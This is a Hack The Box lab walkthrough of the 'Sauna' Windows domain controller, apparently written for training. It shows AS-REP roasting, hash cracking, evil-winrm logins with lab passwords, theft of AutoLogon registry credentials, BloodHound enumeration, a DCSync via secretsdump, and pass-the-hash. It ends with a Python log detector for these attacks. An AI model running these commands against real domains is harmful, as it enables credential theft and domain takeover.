This is a walkthrough of the machine Sauna from Hack The Box.
Machine information:
- Difficulty: Easy
- OS: Windows
- Area of interest: Enterprise Network, Vulnerability Assessment, Active Directory, Security Tools, Authentication
- Vulnerability: Misconfiguration, Autologon Credentials
- Technique: Reconnaissance, User Enumeration, Password Cracking, ASREPRoasting, AD DCSync, Pass the Hash
Nmap
sudo nmap -A --open -v -p- <IP>
Starting off with an Nmap scan, we discover that the machine is a domain controller, and that the domain name is egotistical-bank.local.

Webapp enumeration
Looking at the web application on port 80, we discover employees' names on the page /about.html:

Compiling a list of possible usernames
Using the discovered names, we can manually create a file of possibly valid usernames, including common permutations:
fergus.smith
shaun.coins
bowie.taylor
hugo.bear
steve.kerb
sophie.driver
fergus_smith
shaun_coins
bowie_taylor
hugo_bear
steve_kerb
sophie_driver
f.smith
s.coins
h.bear
b.taylor
s.kerb
s.driver
fsmith
scoins
hbear
btaylor
skerb
sdriver
AS-REP Roasting
Next, we will use the usernames we have created to try AS-REP roasting with impacket-GetNPUsers:
impacket-GetNPUsers -dc-ip <IP> -usersfile usernames EGOTISTICAL-BANK.LOCAL/
And we get a hit on the user fsmith:

Initial access
We will use hashcat in order to crack this hash and get a plaintext credential:
hashcat -m 18200 fsmith.asrep /usr/share/wordlists/rockyou.txt --force

With a pair of credentials in hand, we can obtain initial access with evil-winrm, and read the first user.txt flag:
evil-winrm -i <IP> -u fsmith -p "Thestrokes23"

Lateral movement
Digging around the machine, we eventually find AutoLogon configured and obtain credentials from it. This can be discovered either with WinPEAS or by querying the registry directly:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

However, note that the username from the registry, svc_loanmanager, is invalid. Looking at the existing users, we find a similarly named one, svc_loanmgr:

Using evil-winrm again, we can get a shell as svc_loanmgr:
evil-winrm -i <IP> -u svc_loanmgr -p 'Moneymakestheworldgoround!'
Privilege escalation
We will upload the SharpHound executable using evil-winrm:
upload SharpHound.exe
Next, we will start collection, save the output files and ingest them into BloodHound:
.\SharpHound.exe -c All --outputdirectory C:\Users\svc_loanmgr\Documents\ --outputprefix sauna
bloodhound
In BloodHound, we can click on our current user, svc_loanmgr, and check what outbound object control we have:

svc_loanmgr has GetChangesAll and GetChanges over the domain object. Clicking on each of these rights in BloodHound and reviewing the General and Linux Abuse tabs reveals that, when paired, they allow a DCSync with impacket-secretsdump:

Finally, we run impacket-secretsdump and pass the dumped Administrator NT hash to evil-winrm to get a shell as Administrator and read the second flag, root.txt:
impacket-secretsdump EGOTISTICAL-BANK/svc_loanmgr:'Moneymakestheworldgoround!'@<IP> -just-dc

evil-winrm -i <IP> -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
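Both the AS-REP roasting step and the DCSync step above leave distinctive traces in the domain controller's Security log. The following is an added defender-side example, not part of the original walkthrough: it scans flattened Security events for 4768 tickets issued without pre-authentication and for 4662 control-access events carrying the directory replication GUIDs from a principal that is not a domain controller. The flattened field names, the DC_ACCOUNTS set and the sample events are constructed assumptions for this example.

```python
import re

# Control-access right GUIDs that, held together, allow directory
# replication (the rights BloodHound shows as GetChanges/GetChangesAll).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

# Principals expected to replicate: the domain's DC computer accounts.
# Constructed for this example; populate it from your own domain.
DC_ACCOUNTS = {"SAUNA$"}


def classify(event):
    """Return an alert string for one flattened Security event, else None."""
    eid = event.get("EventID")
    if eid == 4768 and event.get("PreAuthType") == "0":
        # TGT issued as "logon without pre-authentication": the target account
        # has DONT_REQ_PREAUTH set and its AS-REP can be cracked offline.
        return f"asrep-roast:{event.get('TargetUserName')}"
    if eid == 4662 and event.get("AccessMask") == "0x100":  # Control Access
        guids = set(GUID_RE.findall(event.get("Properties", "").lower()))
        if guids & REPL_GUIDS and event.get("SubjectUserName", "").upper() not in DC_ACCOUNTS:
            return f"dcsync:{event.get('SubjectUserName')}"
    return None


def scan(events):
    """Return every alert raised over an iterable of events, in order."""
    return [alert for alert in map(classify, events) if alert]


# Constructed sample events mirroring the walkthrough: the GetNPUsers hit on
# fsmith, a normal pre-authenticated logon, legitimate DC-to-DC replication,
# and the secretsdump DCSync performed as svc_loanmgr.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "fsmith", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": 4768, "TargetUserName": "sdriver", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

4662 events are only written when the "Audit Directory Service Access" subcategory is enabled and a SACL on the domain object covers these control-access rights, so confirm that auditing is in place before relying on this detection.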